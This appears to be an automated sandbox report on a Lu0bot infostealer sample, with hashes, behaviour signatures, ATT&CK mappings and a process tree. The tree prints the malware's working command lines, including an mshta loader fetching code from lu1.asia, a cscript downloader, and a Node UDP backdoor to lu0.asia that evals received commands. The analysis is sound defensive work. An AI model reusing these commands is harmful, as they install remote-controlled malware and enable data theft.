Analysis

  • max time kernel
    147s
  • max time network
    146s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    29-06-2021 10:01

General

  • Target

    usfive_20210629.exe

  • Size

    2KB

  • MD5

    09353c5898ccf513210a58fb9bb369e7

  • SHA1

    bb664adcc58466a0b158651a9e4216dbfd08607b

  • SHA256

    28918d35a5f4103695d04817fd2ac7de977d316a0cc94dad3b3f124f030686bc

  • SHA512

    0cd0a4f8b38b92d9bf46f2e068ce99917a7835b8bcb4a9ec4b0d3e7d570f34f48252e4e82df5f1fffc075aa82ae9c3eaab0e4e943de56f5003c97efd78c44e15

Malware Config

Signatures

  • Lu0bot

    Lu0bot is a lightweight infostealer written in NodeJS.

  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • NTFS ADS 2 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\usfive_20210629.exe
    "C:\Users\Admin\AppData\Local\Temp\usfive_20210629.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3956
    • C:\Windows\SysWOW64\mshta.exe
      mshta "javascript:document.write();249;y=unescape('%340%7Eh%74t%70%3A%2F%2F%6Cu%31%2E%61s%69a%2Fh%72i%2F%3F%321%616%654%62%7E%322%35').split('~');230;try{x='WinHttp';9;x=new ActiveXObject(x+'.'+x+'Request.5.1');231;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);65;x.send();195;y='ipt.S';106;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);152;}catch(e){};214;;window.close();"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:2900
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1624960881303.txt & cscript /nologo /e:jscript get1624960881303.txt "http%3A%2F%2Flu1.asia%2Fhri%2F%3F23c306a35%26b%3D3d2aef90" node.cab & expand node.cab node.exe & del get1624960881303.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1624960881303.txt & cscript /nologo /e:jscript get1624960881303.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%273c306a35%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu0.asia%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1624960881303.txt
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2216
        • C:\Windows\SysWOW64\cscript.exe
          cscript /nologo /e:jscript get1624960881303.txt "http%3A%2F%2Flu1.asia%2Fhri%2F%3F23c306a35%26b%3D3d2aef90" node.cab
          4⤵
          • Blocklisted process makes network request
          PID:2672
        • C:\Windows\SysWOW64\expand.exe
          expand node.cab node.exe
          4⤵
          • Drops file in Windows directory
          PID:3772
        • C:\Windows\SysWOW64\cscript.exe
          cscript /nologo /e:jscript get1624960881303.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%273c306a35%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu0.asia%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3672
          • C:\ProgramData\DNTException\node.exe
            "C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%273c306a35%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu0.asia%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))
            5⤵
            • Executes dropped EXE
            • Checks processor information in registry
            • NTFS ADS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3396
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c dir C:\
              6⤵
                PID:2212
              • C:\Windows\SysWOW64\cacls.exe
                cacls.exe C:\ProgramData\DNTException /t /e /c /g Everyone:F
                6⤵
                  PID:680
                • C:\Windows\SysWOW64\icacls.exe
                  icacls.exe C:\ProgramData\DNTException /t /c /grant *S-1-1-0:(f)
                  6⤵
                  • Modifies file permissions
                  PID:2484
                • C:\Windows\SysWOW64\attrib.exe
                  attrib.exe +H C:\ProgramData\DNTException
                  6⤵
                  • Views/modifies file attributes
                  PID:612
                • C:\Windows\SysWOW64\attrib.exe
                  attrib.exe +H C:\ProgramData\DNTException\node.exe
                  6⤵
                  • Views/modifies file attributes
                  PID:2744
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist /fo csv /nh
                  6⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1424
                • C:\Windows\SysWOW64\Wbem\wmic.exe
                  wmic process get processid,parentprocessid,name,executablepath /format:csv
                  6⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1328
                • C:\Windows\SysWOW64\ipconfig.exe
                  ipconfig.exe /all
                  6⤵
                  • Gathers network information
                  PID:2576
                • C:\Windows\SysWOW64\route.exe
                  route.exe print
                  6⤵
                    PID:3372
                  • C:\Windows\SysWOW64\netstat.exe
                    netstat.exe -ano
                    6⤵
                    • Gathers network information
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2140
                  • C:\Windows\SysWOW64\systeminfo.exe
                    systeminfo.exe /fo csv
                    6⤵
                    • Gathers system information
                    PID:2332

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Execution

        Command-Line Interface

        1
        T1059

        Persistence

        Hidden Files and Directories

        1
        T1158

        Defense Evasion

        File Permissions Modification

        1
        T1222

        Hidden Files and Directories

        1
        T1158

        Discovery

        System Information Discovery

        4
        T1082

        Query Registry

        1
        T1012

        Process Discovery

        1
        T1057

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\DNTException\get1624960881303.txt
          MD5

          e15f82747d0884d61a5bc4fb2db7d29d

          SHA1

          aca478622586f17603fe56705fd319b75198b2b0

          SHA256

          982675d0465497986b3ece89f08f81a4629d975617671153e0ca653f2589966f

          SHA512

          d8c17e54cbefa72191c238f23d619a4637fd74c8c8b9975071bf5507c5a34259495cd20e516c7f7f0c215ec4f724b22de88b8a5ea43765c019eb067600cf661d

        • C:\ProgramData\DNTException\get1624960881303.txt
          MD5

          52ec5ebd8a447b5115ce83e703bcde51

          SHA1

          38ce97f87c6be668d07985558fc89c53e27770a3

          SHA256

          ef1be6a77e480e683331052654d3db47a02fe4b7af3e35e67b9248e989307615

          SHA512

          9af71d426564ef92ff6de1d89107161c138bbdd9dc08b5e380a0b94e7b2e91ec4d498a1d8f4514552a45bf14a8f9078dc295aa1cb86cfc063427ad218e9d5f32

        • C:\ProgramData\DNTException\node.cab
          MD5

          c7ed3d9304a29c8b472174bd910be071

          SHA1

          22b7d55b80acd434c13b0a2d8c59b45c10220a42

          SHA256

          abbaffb1b56bd3c5db5aedf4bdc0794d82bedba43677d13cd1056cb5412b3441

          SHA512

          c65c80564019ae54145a939f9ed463895c337f020cbd769647dc6baf8db5db283a5e151c2ae4f10681d23db161d791ce59c395d8ebba603a27a2a6be0368a1a2

        • C:\ProgramData\DNTException\node.exe
          MD5

          11f0b4e17e686cdc46f85a6becede4a8

          SHA1

          2826f7ac33b43439ecddd08ad541a7f54a9eb7c0

          SHA256

          6a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c

          SHA512

          11a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f

        • C:\ProgramData\DNTException\node.exe
          MD5

          11f0b4e17e686cdc46f85a6becede4a8

          SHA1

          2826f7ac33b43439ecddd08ad541a7f54a9eb7c0

          SHA256

          6a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c

          SHA512

          11a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f

        • memory/612-134-0x0000000000000000-mapping.dmp
        • memory/680-132-0x0000000000000000-mapping.dmp
        • memory/1328-137-0x0000000000000000-mapping.dmp
        • memory/1424-136-0x0000000000000000-mapping.dmp
        • memory/2140-140-0x0000000000000000-mapping.dmp
        • memory/2212-131-0x0000000000000000-mapping.dmp
        • memory/2216-115-0x0000000000000000-mapping.dmp
        • memory/2332-141-0x0000000000000000-mapping.dmp
        • memory/2484-133-0x0000000000000000-mapping.dmp
        • memory/2576-138-0x0000000000000000-mapping.dmp
        • memory/2672-116-0x0000000000000000-mapping.dmp
        • memory/2744-135-0x0000000000000000-mapping.dmp
        • memory/2900-114-0x0000000000000000-mapping.dmp
        • memory/3372-139-0x0000000000000000-mapping.dmp
        • memory/3396-129-0x000000001EF00000-0x000000001EF01000-memory.dmp
          Filesize

          4KB

        • memory/3396-130-0x000000002FC00000-0x000000002FC01000-memory.dmp
          Filesize

          4KB

        • memory/3396-127-0x000000003DE00000-0x000000003DE01000-memory.dmp
          Filesize

          4KB

        • memory/3396-128-0x0000000037900000-0x0000000037901000-memory.dmp
          Filesize

          4KB

        • memory/3396-126-0x000000000F200000-0x000000000F201000-memory.dmp
          Filesize

          4KB

        • memory/3396-125-0x0000000015200000-0x0000000015201000-memory.dmp
          Filesize

          4KB

        • memory/3396-123-0x0000000000000000-mapping.dmp
        • memory/3672-120-0x0000000000000000-mapping.dmp
        • memory/3772-118-0x0000000000000000-mapping.dmp